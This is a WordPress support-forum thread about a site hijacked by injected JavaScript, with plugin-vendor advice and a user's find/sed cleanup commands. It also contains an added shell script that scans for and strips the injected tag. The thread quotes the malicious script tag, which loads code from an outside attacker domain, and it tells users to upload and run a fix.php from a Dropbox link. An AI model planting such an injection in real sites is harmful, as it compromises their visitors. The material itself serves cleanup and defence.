hacked
Hi,
When opening my site (and admin), I’m directed to
which is immediately referred to also:
Hacked ? … so what can I do please ?
?
Best Regards,
Fritz.-
This topic was modified 4 years, 10 months ago by
Jan Dembowski.
Hello @fritzke
Did you start a scan using the CleanTalk Security plugin?
What result did you get?
Hi,
That’s not possible because I can’t get into my admin or site.
Hacked ? … so what can I do please ?
It seems yes. Please contact your hosting provider to restore the site from a good, functional backup copy.
When that is done, scan the site using the CleanTalk Security plugin and give us feedback with the results found.
Best regards,
ok … I’m busy restoring a backup … thanks … I’ll let you know
Can “WPBakery Page Builder” be the culprit ?
Problems, slow and finally nothing anymore, started when working with built-in content elements “hover box”.
Thank you all for your feedback.
We recommend the following steps:
1) Contact your hosting provider to restore the site from a good, functional backup copy.
2) Install the Security for WordPress plugin. https://downloads.www.ads-software.com/plugin/security-malware-firewall.2.46.2.zip
3) Scan the site using the CleanTalk Security plugin and give us feedback with the results found https://cleantalk.org/help/security-malware-scanner
4)Send us scanner results using this guide https://cleantalk.org/help/files-analysis
Best wishes
Hi,
I sent 7 “critical” files. But I think those are false positives.
Hello.
My website has been attacked this night too.
All your index.php files have been infected by an injection of a javascript call '<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>'
1 – You have to remove this line in each index file by using find & sed
find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g" {} +
2 – Remove extra index files created by the script
find . -name "._index.php" -print -delete
3 – The script has changed the siteurl in the database; you have to fix it
in the table wp_options where option_name is siteurl replace the option_value by the correct url
Glad to help
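An added example, not part of the original posts: a review-first version of steps 1 and 2 above. It goes beyond the post by checking every .php file (a later reply reports header.php being modified) and by copying each infected file to a quarantine directory before editing it. It assumes GNU grep and GNU sed; the function names are hypothetical and the sample tree is constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Assumes GNU grep and GNU sed.
# BAD_HOST is the domain quoted in the post; function names are hypothetical.
BAD_HOST='ws.stivenfernando.com'

# List every PHP file under $1 that references the injected host.
scan_injected() {
    grep -rlF --include='*.php' -- "$BAD_HOST" "$1" 2>/dev/null | sort
}

# List the extra "._index.php" files mentioned in step 2.
list_dropped() {
    find "$1" -type f -name '._index.php' | sort
}

# Copy each infected file into quarantine dir $2 (keep it outside the web
# root), then strip only <script> tags whose src points at BAD_HOST.
# Prints the files it changed.
clean_injected() {
    host_re=$(printf '%s' "$BAD_HOST" | sed 's/\./\\./g')
    scan_injected "$1" | while IFS= read -r f; do
        case "$f" in */._index.php) continue ;; esac  # dropped files get deleted, not edited
        rel=${f#"$1"/}
        mkdir -p "$2/$(dirname "$rel")"
        cp -p -- "$f" "$2/$rel"
        sed -i -E "s#<script[^>]*src=['\"]https?://${host_re}/[^'\"]*['\"][^>]*></script>##g" "$f"
        printf '%s\n' "$f"
    done
}

# Build a constructed sample tree so the functions can be tried offline.
make_sample() {
    sample_root=$(mktemp -d)
    mkdir -p "$sample_root/wp-content/themes/demo"
    printf '%s\n' '<?php // front controller' \
        "<script type='text/javascript' src='https://${BAD_HOST}/stm?v=2.2.0'></script>" \
        > "$sample_root/index.php"
    printf '%s\n' '<?php wp_head(); ?>' > "$sample_root/wp-content/themes/demo/header.php"
    printf '%s\n' '<?php // dropped copy' > "$sample_root/wp-content/._index.php"
    printf '%s\n' "$sample_root"
}
```

Review the output of scan_injected and list_dropped before calling clean_injected. The siteurl fix in step 3 is a database change and is not covered by this script.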
@fritzke We’ve checked these files. Yes, they are safe.
@nikko75 Thank you for help! This must be a solution.
Best regards,
SOLVED (For my case at least)
If you look at the code that @jommartinez posted – I’m sure that is what affected the site of mine. The only file that is modified is the header.php in the theme. This is reflected in his posted code.
Some of you on this thread may have had a slightly modified version of this or have suffered multiple hacks so this fix may not resolve the issue for everyone here.
For my specific case I did the following;
– Removed the line from the header.php file in your theme – if you can, remove the line where it is calling the JavaScript (it may be called in an abstract way, like it was on my site, using the “cryptico.js” JS to encrypt the exploit call, making it harder to notice).
– Once this has been done you will need to roll back your database.
– I would strongly recommend any of you using a PHP version lower than 7.2 to upgrade.
I would be keen to hear if this helped anyone else.
-
This reply was modified 4 years, 10 months ago by
spaceapemedia.
Hello @donnjke @spaceapemedia @tomtschi @maltris @nathalierobayo
Please, someone send the “header.php”, templates and JS files. We are making a cure right now. It will be ready in 10 minutes, but we need the data.
Send the files to [email protected].
Note: Malware code has been removed by the moderators. Please do not post malware here.
Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
If you need support and you are not the person who originally raised this support topic then per the forum guidelines please start your own topic.
You can do so here.
https://www.ads-software.com/support/plugin/security-malware-firewall/#new-post
I am closing this topic and archiving all of the pile on replies. I’ve left a couple that were helpful. Do not take over someone else’s topic that way again. That’s not how these forums work and please create your own topic instead.
Per @shagimuratov
Hello everyone.
The cure is here. I mean this topic https://www.ads-software.com/support/topic/hacked-138/
Install the latest plugin from here: https://github.com/CleanTalk/security-malware-firewall/releases/download/dev-version/security-malware-firewall.zip.
Switch setting “Cure malware” and “Signature analysis”, save settings and run the scan.
It will cure JS script attachments in PHP files and malicious PHP code.
If your database is malformed and you are experiencing difficulties with restoring it, put this file (https://www.dropbox.com/s/xr421acpxbqp72j/fix.php?dl=0) in the root directory and proceed to YOUR_WEBSITE.URL/fix.php. Do not forget to delete it!
Let us know if you have questions.
If you do have questions, please post your own support topic.
- The topic ‘hacked’ is closed to new replies.